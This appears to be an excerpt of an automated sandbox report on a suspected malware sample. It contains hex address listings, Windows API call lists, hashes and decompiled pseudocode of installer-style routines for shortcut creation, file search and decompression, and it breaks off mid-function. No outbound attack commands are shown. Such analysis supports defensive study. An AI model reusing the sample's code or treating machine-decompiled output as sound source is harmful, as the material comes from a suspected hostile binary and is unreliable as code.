                                                  0x7108216c
                                                  0x7108216e
                                                  0x7108216f
                                                  0x7108216f
                                                  0x7108216f
                                                  0x71082170
                                                  0x71082173
                                                  0x71082176
                                                  0x71082177
                                                  0x71082151
                                                  0x71082152
                                                  0x71082153
                                                  0x71082156
                                                  0x71082159
                                                  0x7108215c
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x7108215c
                                                  0x00000000
                                                  0x71081fa7
                                                  0x00000000
                                                  0x00000000
                                                  0x71081fb3
                                                  0x00000000
                                                  0x00000000
                                                  0x71081f9a
                                                  0x71081f9e
                                                  0x71081fa2
                                                  0x00000000
                                                  0x00000000
                                                  0x7108211c
                                                  0x71082120
                                                  0x00000000
                                                  0x00000000
                                                  0x71082126
                                                  0x7108212f
                                                  0x71082136
                                                  0x7108213e
                                                  0x00000000
                                                  0x00000000
                                                  0x71082083
                                                  0x71082083
                                                  0x00000000
                                                  0x00000000
                                                  0x71081fbc
                                                  0x00000000
                                                  0x00000000
                                                  0x710821a6
                                                  0x00000000
                                                  0x00000000
                                                  0x7108208b
                                                  0x7108208d
                                                  0x7108208d
                                                  0x00000000
                                                  0x00000000
                                                  0x71082196
                                                  0x00000000
                                                  0x00000000
                                                  0x7108219a
                                                  0x00000000
                                                  0x00000000
                                                  0x710821a2
                                                  0x00000000
                                                  0x00000000
                                                  0x710820d3
                                                  0x710820d5
                                                  0x710820d5
                                                  0x00000000
                                                  0x00000000
                                                  0x7108209d
                                                  0x7108209f
                                                  0x7108209f
                                                  0x00000000
                                                  0x00000000
                                                  0x710820af
                                                  0x710820b1
                                                  0x710820b1
                                                  0x00000000
                                                  0x00000000
                                                  0x710820e1
                                                  0x710820e3
                                                  0x710820e3
                                                  0x00000000
                                                  0x00000000
                                                  0x710820ba
                                                  0x710820bc
                                                  0x710820bc
                                                  0x00000000
                                                  0x00000000
                                                  0x710820c1
                                                  0x00000000
                                                  0x00000000
                                                  0x7108219e
                                                  0x710821a8
                                                  0x710821a8
                                                  0x00000000
                                                  0x00000000
                                                  0x710820ec
                                                  0x710820f0
                                                  0x710820f5
                                                  0x710820f8
                                                  0x710820f9
                                                  0x710820fc
                                                  0x71082102
                                                  0x71082102
                                                  0x00000000
                                                  0x00000000
                                                  0x7108218e
                                                  0x00000000
                                                  0x00000000
                                                  0x710820c5
                                                  0x710820c7
                                                  0x710820c7
                                                  0x00000000
                                                  0x00000000
                                                  0x71081fc3
                                                  0x71081fc3
                                                  0x00000000
                                                  0x00000000
                                                  0x710820da
                                                  0x710820dc
                                                  0x710820dc
                                                  0x00000000
                                                  0x00000000
                                                  0x71081f67
                                                  0x71081f6d
                                                  0x71081f70
                                                  0x71081f72
                                                  0x71081f72
                                                  0x71081f75
                                                  0x71081f79
                                                  0x71081f86
                                                  0x71081f88
                                                  0x71081f8e
                                                  0x71081f8e
                                                  0x71081f8e
                                                  0x00000000
                                                  0x00000000
                                                  0x7108208e
                                                  0x7108208e
                                                  0x71082090
                                                  0x71082097
                                                  0x00000000
                                                  0x00000000
                                                  0x710820d6
                                                  0x710820d6
                                                  0x00000000
                                                  0x00000000
                                                  0x710820a0
                                                  0x710820a0
                                                  0x710820a2
                                                  0x710820a9
                                                  0x00000000
                                                  0x00000000
                                                  0x710820b2
                                                  0x710820b2
                                                  0x710820b4
                                                  0x00000000
                                                  0x00000000
                                                  0x710820e4
                                                  0x710820e4
                                                  0x00000000
                                                  0x00000000
                                                  0x710820bd
                                                  0x710820bd
                                                  0x00000000
                                                  0x00000000
                                                  0x7108210a
                                                  0x7108210e
                                                  0x71082113
                                                  0x71082116
                                                  0x00000000
                                                  0x00000000
                                                  0x710820c8
                                                  0x710820c8
                                                  0x710820cb
                                                  0x710820cd
                                                  0x00000000
                                                  0x00000000
                                                  0x710820dd
                                                  0x710820dd
                                                  0x710820e6
                                                  0x710820e6
                                                  0x71081fc5
                                                  0x71081fc5
                                                  0x71081fc8
                                                  0x71081fcf
                                                  0x71081fd1
                                                  0x71081fd3
                                                  0x71081fda
                                                  0x71081fdd
                                                  0x71081fe2
                                                  0x71081fe4
                                                  0x71081fe6
                                                  0x71081fea
                                                  0x71081ff0
                                                  0x71081ff6
                                                  0x71081ff6
                                                  0x71081ff8
                                                  0x71081ff8
                                                  0x71081ff9
                                                  0x71081ff9
                                                  0x71081ffd
                                                  0x71082003
                                                  0x71082005
                                                  0x71082009
                                                  0x7108200e
                                                  0x7108200e
                                                  0x71082010
                                                  0x71082010
                                                  0x71082013
                                                  0x71082016
                                                  0x7108201f
                                                  0x71082025
                                                  0x71082028
                                                  0x71082028
                                                  0x7108202a
                                                  0x7108202d
                                                  0x71082033
                                                  0x71082039
                                                  0x71082039
                                                  0x7108203b
                                                  0x00000000
                                                  0x00000000
                                                  0x71082041
                                                  0x71082041
                                                  0x71082045
                                                  0x7108204c
                                                  0x71082070
                                                  0x71082070
                                                  0x71082074
                                                  0x71082076
                                                  0x71082079
                                                  0x71082079
                                                  0x7108207c
                                                  0x7108207c
                                                  0x00000000
                                                  0x71082074
                                                  0x71082051
                                                  0x71082054
                                                  0x71082054
                                                  0x7108205b
                                                  0x7108205d
                                                  0x71082060
                                                  0x71082067
                                                  0x71082068
                                                  0x7108206e
                                                  0x7108206e
                                                  0x00000000
                                                  0x7108206e
                                                  0x71082062
                                                  0x71082065
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x71082065
                                                  0x71081ff2
                                                  0x71081ff4
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x71081f60
                                                  0x71081e05
                                                  0x71081e05
                                                  0x71081e06
                                                  0x71081f46
                                                  0x00000000
                                                  0x71081f46
                                                  0x71081e0c
                                                  0x71081e0d
                                                  0x00000000
                                                  0x00000000
                                                  0x71081e13
                                                  0x71081e16
                                                  0x71081f0b
                                                  0x71081f0b
                                                  0x71081f0e
                                                  0x71081f23
                                                  0x71081f25
                                                  0x71081f25
                                                  0x71081f26
                                                  0x71081f29
                                                  0x71081f2c
                                                  0x71081f38
                                                  0x71081f38
                                                  0x71081f38
                                                  0x71081f2e
                                                  0x71081f2e
                                                  0x71081f2e
                                                  0x71081f3e
                                                  0x00000000
                                                  0x71081f3e
                                                  0x71081f10
                                                  0x71081f10
                                                  0x71081f11
                                                  0x71081f1f
                                                  0x00000000
                                                  0x71081f1f
                                                  0x71081f14
                                                  0x71081f15
                                                  0x00000000
                                                  0x00000000
                                                  0x71081f1b
                                                  0x00000000
                                                  0x71081f1b
                                                  0x71081e1c
                                                  0x71081f07
                                                  0x00000000
                                                  0x71081f07
                                                  0x71081e22
                                                  0x71081e22
                                                  0x71081e25
                                                  0x71081e4e
                                                  0x00000000
                                                  0x71081e4e
                                                  0x71081e27
                                                  0x71081e27
                                                  0x71081e2a
                                                  0x71081e44
                                                  0x00000000
                                                  0x71081e44
                                                  0x71081e2c
                                                  0x71081e2c
                                                  0x71081e2f
                                                  0x71081e3e
                                                  0x00000000
                                                  0x71081e3e
                                                  0x71081e32
                                                  0x71081e33
                                                  0x00000000
                                                  0x00000000
                                                  0x71081e35
                                                  0x00000000
                                                  0x71081cec
                                                  0x71081cec
                                                  0x71081cef
                                                  0x00000000
                                                  0x71081cef
                                                  0x71081ce6
                                                  0x71081cd3
                                                  0x71081cd8
                                                  0x00000000
                                                  0x00000000
                                                  0x71081cda
                                                  0x71081cdd
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x71081cdd
                                                  0x71081c6d
                                                  0x71081c70
                                                  0x71081ca6
                                                  0x71081ca9
                                                  0x00000000
                                                  0x71081caf
                                                  0x71081cb1
                                                  0x71081cb5
                                                  0x71081cbc
                                                  0x71081cc3
                                                  0x71081cc6
                                                  0x71081cc9
                                                  0x00000000
                                                  0x71081cc9
                                                  0x71081ca9
                                                  0x71081c72
                                                  0x71081c73
                                                  0x71081c8e
                                                  0x71081c91
                                                  0x00000000
                                                  0x71081c97
                                                  0x71081c97
                                                  0x71081c9e
                                                  0x71081ca1
                                                  0x00000000
                                                  0x71081ca1
                                                  0x71081c91
                                                  0x71081c78
                                                  0x00000000
                                                  0x71081c7e
                                                  0x71081c7e
                                                  0x71081c85
                                                  0x00000000
                                                  0x71081c85
                                                  0x71081c78
                                                  0x71081e74
                                                  0x71081e79
                                                  0x71081e7e
                                                  0x71081e82
                                                  0x71082355
                                                  0x7108235b
                                                  0x71081e94
                                                  0x71081e96
                                                  0x71081e97
                                                  0x7108227e
                                                  0x7108227e
                                                  0x71082281
                                                  0x71082284
                                                  0x710822a1
                                                  0x710822a7
                                                  0x710822a9
                                                  0x710822af
                                                  0x710822c6
                                                  0x710822c6
                                                  0x710822c6
                                                  0x710822d3
                                                  0x710822d9
                                                  0x710822dc
                                                  0x710822e2
                                                  0x710822e4
                                                  0x710822e8
                                                  0x710822ea
                                                  0x710822f1
                                                  0x710822f6
                                                  0x710822f9
                                                  0x710822fb
                                                  0x71082300
                                                  0x71082312
                                                  0x71082312
                                                  0x71082300
                                                  0x710822f9
                                                  0x710822e8
                                                  0x71082318
                                                  0x7108231b
                                                  0x71082325
                                                  0x7108232d
                                                  0x7108233a
                                                  0x71082340
                                                  0x71082343
                                                  0x71082273
                                                  0x71082273
                                                  0x00000000
                                                  0x71082273
                                                  0x71082349
                                                  0x7108234f
                                                  0x7108234f
                                                  0x00000000
                                                  0x00000000
                                                  0x71082351
                                                  0x71082351
                                                  0x71082351
                                                  0x71082351
                                                  0x00000000
                                                  0x7108231d
                                                  0x7108231d
                                                  0x71082323
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x71082323
                                                  0x7108231b
                                                  0x710822b2
                                                  0x710822b8
                                                  0x710822ba
                                                  0x710822c0
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x710822c0
                                                  0x71082286
                                                  0x7108228d
                                                  0x71082293
                                                  0x71082299
                                                  0x00000000
                                                  0x71082299
                                                  0x71081e9d
                                                  0x71081e9e
                                                  0x7108225d
                                                  0x7108225d
                                                  0x71082263
                                                  0x71082266
                                                  0x00000000
                                                  0x00000000
                                                  0x7108226d
                                                  0x71082272
                                                  0x00000000
                                                  0x71082272
                                                  0x71081ea5
                                                  0x00000000
                                                  0x00000000
                                                  0x71081eab
                                                  0x71081eab
                                                  0x71081eb4
                                                  0x71081eb9
                                                  0x71081ebf
                                                  0x00000000
                                                  0x00000000
                                                  0x71081ec5
                                                  0x71081ed2
                                                  0x71081ed8
                                                  0x71081ee2
                                                  0x71081ee8
                                                  0x71081ef0
                                                  0x71081f00
                                                  0x00000000
                                                  0x71081f00

                                                  APIs
                                                    • Part of subcall function 710812BB: GlobalAlloc.KERNEL32(00000040,?,710812DB,?,7108137F,00000019,710811CA,-000000A0), ref: 710812C5
                                                  • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 71081D2D
                                                  • lstrcpyW.KERNEL32(00000008,?), ref: 71081D75
                                                  • lstrcpyW.KERNEL32(00000808,?), ref: 71081D7F
                                                  • GlobalFree.KERNEL32(00000000), ref: 71081D92
                                                  • GlobalFree.KERNEL32(?), ref: 71081E74
                                                  • GlobalFree.KERNEL32(?), ref: 71081E79
                                                  • GlobalFree.KERNEL32(?), ref: 71081E7E
                                                  • GlobalFree.KERNEL32(00000000), ref: 71082068
                                                  • lstrcpyW.KERNEL32(?,?), ref: 71082222
                                                  • GetModuleHandleW.KERNEL32(00000008), ref: 710822A1
                                                  • LoadLibraryW.KERNEL32(00000008), ref: 710822B2
                                                  • GetProcAddress.KERNEL32(?,?), ref: 7108230C
                                                  • lstrlenW.KERNEL32(00000808), ref: 71082326
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.970618355.0000000071081000.00000020.00000001.01000000.00000004.sdmp, Offset: 71080000, based on PE: true
                                                  • Associated: 00000000.00000002.970532047.0000000071080000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.970731155.0000000071084000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.970830151.0000000071086000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_71080000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                  • String ID:
                                                  • API String ID: 245916457-0
                                                  • Opcode ID: d2d4b861ddad5223a171aaba7a93253eb0c9d3ee248d121dda4454d82a0d3ed1
                                                  • Instruction ID: 8ff8dd13c2f2981bb74bf7147bfa5dd978d7eee9b0945988e6cea1344e57dd6e
                                                  • Opcode Fuzzy Hash: d2d4b861ddad5223a171aaba7a93253eb0c9d3ee248d121dda4454d82a0d3ed1
                                                  • Instruction Fuzzy Hash: C9228B71D0C60ADEDB129FB4C5807EEBBF6FF08B15F20456AE166E6280D7709685CB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 67%
                                                  			E004021AA(void* __eflags) {
                                                  				signed int _t52;
                                                  				void* _t56;
                                                  				intOrPtr* _t60;
                                                  				intOrPtr _t61;
                                                  				intOrPtr* _t62;
                                                  				intOrPtr* _t64;
                                                  				intOrPtr* _t66;
                                                  				intOrPtr* _t68;
                                                  				intOrPtr* _t70;
                                                  				intOrPtr* _t72;
                                                  				intOrPtr* _t74;
                                                  				intOrPtr* _t76;
                                                  				intOrPtr* _t78;
                                                  				intOrPtr* _t80;
                                                  				void* _t83;
                                                  				intOrPtr* _t91;
                                                  				signed int _t101;
                                                  				signed int _t105;
                                                  				void* _t107;
                                                  
                                                  				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
                                                  				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
                                                  				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
                                                  				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
                                                  				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
                                                  				_t52 =  *(_t107 - 0x20);
                                                  				 *(_t107 - 0x50) = _t52 & 0x00000fff;
                                                  				_t101 = _t52 & 0x00008000;
                                                  				_t105 = _t52 >> 0x0000000c & 0x00000007;
                                                  				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
                                                  				if(E00405E83( *((intOrPtr*)(_t107 - 0x44))) == 0) {
                                                  					E00402DA6(0x21);
                                                  				}
                                                  				_t56 = _t107 + 8;
                                                  				__imp__CoCreateInstance(0x4085f0, _t83, 1, 0x4085e0, _t56);
                                                  				if(_t56 < _t83) {
                                                  					L14:
                                                  					 *((intOrPtr*)(_t107 - 4)) = 1;
                                                  					_push(0xfffffff0);
                                                  				} else {
                                                  					_t60 =  *((intOrPtr*)(_t107 + 8));
                                                  					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x408600, _t107 - 0x38);
                                                  					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
                                                  					if(_t61 >= _t83) {
                                                  						_t64 =  *((intOrPtr*)(_t107 + 8));
                                                  						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
                                                  						if(_t101 == _t83) {
                                                  							_t80 =  *((intOrPtr*)(_t107 + 8));
                                                  							 *((intOrPtr*)( *_t80 + 0x24))(_t80, L"C:\\Users\\Arthur\\AppData\\Local\\Temp");
                                                  						}
                                                  						if(_t105 != _t83) {
                                                  							_t78 =  *((intOrPtr*)(_t107 + 8));
                                                  							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
                                                  						}
                                                  						_t66 =  *((intOrPtr*)(_t107 + 8));
                                                  						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
                                                  						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
                                                  						if( *_t91 != _t83) {
                                                  							_t76 =  *((intOrPtr*)(_t107 + 8));
                                                  							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
                                                  						}
                                                  						_t68 =  *((intOrPtr*)(_t107 + 8));
                                                  						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
                                                  						_t70 =  *((intOrPtr*)(_t107 + 8));
                                                  						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
                                                  						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                                                  							_t74 =  *((intOrPtr*)(_t107 - 0x38));
                                                  							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
                                                  						}
                                                  						_t72 =  *((intOrPtr*)(_t107 - 0x38));
                                                  						 *((intOrPtr*)( *_t72 + 8))(_t72);
                                                  					}
                                                  					_t62 =  *((intOrPtr*)(_t107 + 8));
                                                  					 *((intOrPtr*)( *_t62 + 8))(_t62);
                                                  					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                                                  						_push(0xfffffff4);
                                                  					} else {
                                                  						goto L14;
                                                  					}
                                                  				}
                                                  				E00401423();
                                                  				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t107 - 4));
                                                  				return 0;
                                                  			}






















                                                  0x004021b3
                                                  0x004021bd
                                                  0x004021c7
                                                  0x004021d1
                                                  0x004021dc
                                                  0x004021df
                                                  0x004021f9
                                                  0x004021fc
                                                  0x00402202
                                                  0x00402205
                                                  0x0040220f
                                                  0x00402213
                                                  0x00402213
                                                  0x00402218
                                                  0x00402229
                                                  0x00402231
                                                  0x004022e8
                                                  0x004022e8
                                                  0x004022ef
                                                  0x00402237
                                                  0x00402237
                                                  0x00402246
                                                  0x0040224a
                                                  0x0040224d
                                                  0x00402253
                                                  0x00402261
                                                  0x00402264
                                                  0x00402266
                                                  0x00402271
                                                  0x00402271
                                                  0x00402276
                                                  0x00402278
                                                  0x0040227f
                                                  0x0040227f
                                                  0x00402282
                                                  0x0040228b
                                                  0x0040228e
                                                  0x00402294
                                                  0x00402296
                                                  0x004022a0
                                                  0x004022a0
                                                  0x004022a3
                                                  0x004022ac
                                                  0x004022af
                                                  0x004022b8
                                                  0x004022be
                                                  0x004022c0
                                                  0x004022ce
                                                  0x004022ce
                                                  0x004022d1
                                                  0x004022d7
                                                  0x004022d7
                                                  0x004022da
                                                  0x004022e0
                                                  0x004022e6
                                                  0x004022fb
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004022e6
                                                  0x004022f1
                                                  0x00402c2d
                                                  0x00402c39

                                                  APIs
                                                  • CoCreateInstance.OLE32(004085F0,?,00000001,004085E0,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp, xrefs: 00402269
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.943726621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.943674353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943797629.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943839130.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943873169.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944047963.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944072511.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944106193.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944149006.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944177313.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: CreateInstance
                                                  • String ID: C:\Users\user\AppData\Local\Temp
                                                  • API String ID: 542301482-670666241
                                                  • Opcode ID: c4fc3fa67b876c583326420a1baafc892d445f4eb77b454d3c92970a980d6818
                                                  • Instruction ID: 5977cb51530078b600b156af0050786de557c4b464dd586e6a5beaa7a0440451
                                                  • Opcode Fuzzy Hash: c4fc3fa67b876c583326420a1baafc892d445f4eb77b454d3c92970a980d6818
                                                  • Instruction Fuzzy Hash: A7411571A00208EFCF40DFE4C989E9D7BB5BF49348B20456AF905EB2D1DB799981CB94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 39%
                                                  			E0040290B(short __ebx, short* __edi) {
                                                  				void* _t21;
                                                  
                                                  				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
                                                  					E00406484( *((intOrPtr*)(_t21 - 0xc)), _t8);
                                                  					_push(_t21 - 0x2b0);
                                                  					_push(__edi);
                                                  					E0040653D();
                                                  				} else {
                                                  					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
                                                  					 *__edi = __ebx;
                                                  					 *((intOrPtr*)(_t21 - 4)) = 1;
                                                  				}
                                                  				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t21 - 4));
                                                  				return 0;
                                                  			}




                                                  0x00402923
                                                  0x0040293e
                                                  0x00402949
                                                  0x0040294a
                                                  0x00402a94
                                                  0x00402925
                                                  0x00402928
                                                  0x0040292b
                                                  0x0040292e
                                                  0x0040292e
                                                  0x00402c2d
                                                  0x00402c39

                                                  APIs
                                                  • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.943726621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.943674353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943797629.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943839130.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943873169.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944047963.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944072511.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944106193.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944149006.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944177313.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: FileFindFirst
                                                  • String ID:
                                                  • API String ID: 1974802433-0
                                                  • Opcode ID: db3e0d9fc2be9d26385cb54e60570df6e1e2b9abacb98404d6fb5f3e13457c69
                                                  • Instruction ID: 3f6fbcf0fd4d311cdd608d5f72697756ed96b8559223cd5d9f1c4d92bc61f1b3
                                                  • Opcode Fuzzy Hash: db3e0d9fc2be9d26385cb54e60570df6e1e2b9abacb98404d6fb5f3e13457c69
                                                  • Instruction Fuzzy Hash: 3CF08271A04105EFD701DBA4ED49AAEB378FF14314F60417BE116F21D0E7B88E159B29
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 79%
                                                  			E00406D85(signed int __ebx, signed int* __esi) {
                                                  				signed int _t396;
                                                  				signed int _t425;
                                                  				signed int _t442;
                                                  				signed int _t443;
                                                  				signed int* _t446;
                                                  				void* _t448;
                                                  
                                                  				L0:
                                                  				while(1) {
                                                  					L0:
                                                  					_t446 = __esi;
                                                  					_t425 = __ebx;
                                                  					if( *(_t448 - 0x34) == 0) {
                                                  						break;
                                                  					}
                                                  					L55:
                                                  					__eax =  *(__ebp - 0x38);
                                                  					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                  					__ecx = __ebx;
                                                  					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                  					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                  					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                  					__ebx = __ebx + 8;
                                                  					while(1) {
                                                  						L56:
                                                  						if(__ebx < 0xe) {
                                                  							goto L0;
                                                  						}
                                                  						L57:
                                                  						__eax =  *(__ebp - 0x40);
                                                  						__eax =  *(__ebp - 0x40) & 0x00003fff;
                                                  						__ecx = __eax;
                                                  						__esi[1] = __eax;
                                                  						__ecx = __eax & 0x0000001f;
                                                  						if(__cl > 0x1d) {
                                                  							L9:
                                                  							_t443 = _t442 | 0xffffffff;
                                                  							 *_t446 = 0x11;
                                                  							L10:
                                                  							_t446[0x147] =  *(_t448 - 0x40);
                                                  							_t446[0x146] = _t425;
                                                  							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
                                                  							L11:
                                                  							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
                                                  							_t446[0x26ea] =  *(_t448 - 0x30);
                                                  							E004074F4( *(_t448 + 8));
                                                  							return _t443;
                                                  						}
                                                  						L58:
                                                  						__eax = __eax & 0x000003e0;
                                                  						if(__eax > 0x3a0) {
                                                  							goto L9;
                                                  						}
                                                  						L59:
                                                  						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
                                                  						__ebx = __ebx - 0xe;
                                                  						_t94 =  &(__esi[2]);
                                                  						 *_t94 = __esi[2] & 0x00000000;
                                                  						 *__esi = 0xc;
                                                  						while(1) {
                                                  							L60:
                                                  							__esi[1] = __esi[1] >> 0xa;
                                                  							__eax = (__esi[1] >> 0xa) + 4;
                                                  							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                                                  								goto L68;
                                                  							}
                                                  							L61:
                                                  							while(1) {
                                                  								L64:
                                                  								if(__ebx >= 3) {
                                                  									break;
                                                  								}
                                                  								L62:
                                                  								if( *(__ebp - 0x34) == 0) {
                                                  									goto L182;
                                                  								}
                                                  								L63:
                                                  								__eax =  *(__ebp - 0x38);
                                                  								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                  								__ecx = __ebx;
                                                  								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                  								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                  								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                  								__ebx = __ebx + 8;
                                                  							}
                                                  							L65:
                                                  							__ecx = __esi[2];
                                                  							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
                                                  							__ebx = __ebx - 3;
                                                  							_t108 = __ecx + 0x4084d4; // 0x121110
                                                  							__ecx =  *_t108;
                                                  							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
                                                  							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
                                                  							__ecx = __esi[1];
                                                  							__esi[2] = __esi[2] + 1;
                                                  							__eax = __esi[2];
                                                  							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
                                                  							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
                                                  								goto L64;
                                                  							}
                                                  							L66:
                                                  							while(1) {
                                                  								L68:
                                                  								if(__esi[2] >= 0x13) {
                                                  									break;
                                                  								}
                                                  								L67:
                                                  								_t119 = __esi[2] + 0x4084d4; // 0x4000300
                                                  								__eax =  *_t119;
                                                  								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
                                                  								_t126 =  &(__esi[2]);
                                                  								 *_t126 = __esi[2] + 1;
                                                  							}
                                                  							L69:
                                                  							__ecx = __ebp - 8;
                                                  							__edi =  &(__esi[0x143]);
                                                  							 &(__esi[0x148]) =  &(__esi[0x144]);
                                                  							__eax = 0;
                                                  							 *(__ebp - 8) = 0;
                                                  							__eax =  &(__esi[3]);
                                                  							 *__edi = 7;
                                                  							__eax = E0040755C( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
                                                  							if(__eax != 0) {
                                                  								L72:
                                                  								 *__esi = 0x11;
                                                  								while(1) {
                                                  									L180:
                                                  									_t396 =  *_t446;
                                                  									if(_t396 > 0xf) {
                                                  										break;
                                                  									}
                                                  									L1:
                                                  									switch( *((intOrPtr*)(_t396 * 4 +  &M004074B4))) {
                                                  										case 0:
                                                  											L101:
                                                  											__eax = __esi[4] & 0x000000ff;
                                                  											__esi[3] = __esi[4] & 0x000000ff;
                                                  											__eax = __esi[5];
                                                  											__esi[2] = __esi[5];
                                                  											 *__esi = 1;
                                                  											goto L102;
                                                  										case 1:
                                                  											L102:
                                                  											__eax = __esi[3];
                                                  											while(1) {
                                                  												L105:
                                                  												__eflags = __ebx - __eax;
                                                  												if(__ebx >= __eax) {
                                                  													break;
                                                  												}
                                                  												L103:
                                                  												__eflags =  *(__ebp - 0x34);
                                                  												if( *(__ebp - 0x34) == 0) {
                                                  													goto L182;
                                                  												}
                                                  												L104:
